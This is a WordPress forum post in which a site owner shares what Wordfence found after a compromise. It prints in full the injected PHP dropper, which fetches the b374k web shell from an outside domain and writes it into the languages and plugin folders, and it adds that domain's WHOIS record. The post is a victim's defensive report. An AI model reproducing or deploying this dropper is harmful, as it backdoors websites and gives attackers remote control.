Wordfence free Found
-
Looks like someone may have gotten into may site… These are what Wordfence found: (I think this was mentioned in your emails)
Edited index.php file inside wp-content:
<?php $sh_path = crtf(); echo "|".$sh_path ."|"; $exepf = php_self(); function crtf() { $shpath = $_SERVER['DOCUMENT_ROOT']."/wp-content/languages/mo.php"; $shf = FFGet("https://st.famousjewelry.top/mo.txt"); if($shf=="") { return -1; } $result = file_put_contents($shpath, $shf); if($result) { return "/wp-content/languages/mo.php"; } $shpath = $_SERVER['DOCUMENT_ROOT']."/wp-content/plugins/dz-seo"; if(!file_exists($shpath)) mkdir($shpath); $shpath = $shpath."/mo.php"; $result = file_put_contents($shpath, $shf); if($result) { return "/wp-content/plugins/dz-seo/mo.php"; } $shpath = dirname(__FILE__)."/mo.php"; $result = file_put_contents($shpath, $shf); return substr($_SERVER["REQUEST_URI"],0,strrpos($_SERVER['REQUEST_URI'],'/'))."/mo.php"; } function php_self(){ $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1); return $php_self; } function FFGet( $url ){ $file_contents =''; $user_agent = $_SERVER['HTTP_USER_AGENT']; if(function_exists('file_get_contents')){ ini_set('user_agent',$user_agent); try { $file_contents = @file_get_contents( $url ); } catch (Exception $e) { } } if(strlen($file_contents)<1&&function_exists('curl_init')){ try { $file_contents =""; $ch = curl_init(); $timeout = 30; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($ch,CURLOPT_USERAGENT,$user_agent); $file_contents = curl_exec( $ch); curl_close( $ch ); } catch (Exception $e) {} } return $file_contents; } ?>And inspecting this file I manually removed the folder dz-seo which had a file called
mo.php which was a rather long file whith this comment:b374k 2.8
Jayalah Indonesiaku
(c)2013
https://code.google.com/p/b374k-shellI did not see the languages folder mentioned in the file but I feel like I need to check any language folder I find.
the domain comes back with:
Domain Name: famousjewelry.top
Domain ID: D20160908G10001G_79830266-TOP
WHOIS Server: whois.paycenter.com.cn
Referral URL: https://www.xinnet.com
Updated Date: 2017-01-09T18:01:53Z
Creation Date: 2016-09-08T05:51:58Z
Registry Expiry Date: 2017-09-08T05:51:58Z
Sponsoring Registrar: XinNet Technology Corporation
Sponsoring Registrar IANA ID: 120
Domain Status: ok https://www.icann.org/epp#OK
Registrant ID: n7ynce8fx8m9b0
Registrant Name: linli
Registrant Organization: linli
Registrant Street: Beijing
Registrant City: shixiaqu
Registrant State/Province: beijingshi
Registrant Postal Code: 100000
Registrant Country: CN
Registrant Phone: +86.01099305610
Registrant Phone Ext:
Registrant Fax: +86.01099305610
Registrant Fax Ext:
Registrant Email: [email protected]
Admin ID: 7kr8w18009e063
Admin Name: linli
Admin Organization: linli
Admin Street: Beijing
Admin City: shixiaqu
Admin State/Province: beijingshi
Admin Postal Code: 100000
Admin Country: CN
Admin Phone: +86.01099305610
Admin Phone Ext:
Admin Fax: +86.01099305610
Admin Fax Ext:
Admin Email: [email protected]
Tech ID: 7kr8w18009e063
Tech Name: linli
Tech Organization: linli
Tech Street: Beijing
Tech City: shixiaqu
Tech State/Province: beijingshi
Tech Postal Code: 100000
Tech Country: CN
Tech Phone: +86.01099305610
Tech Phone Ext:
Tech Fax: +86.01099305610
Tech Fax Ext:
Tech Email: [email protected]
Name Server: ns18.xincache.com
Name Server: ns17.xincache.comThanks for the Wordfence plugin
If you want the files you can get them here.
Just wanted to let you and whoever else know…
- The topic ‘Wordfence free Found’ is closed to new replies.
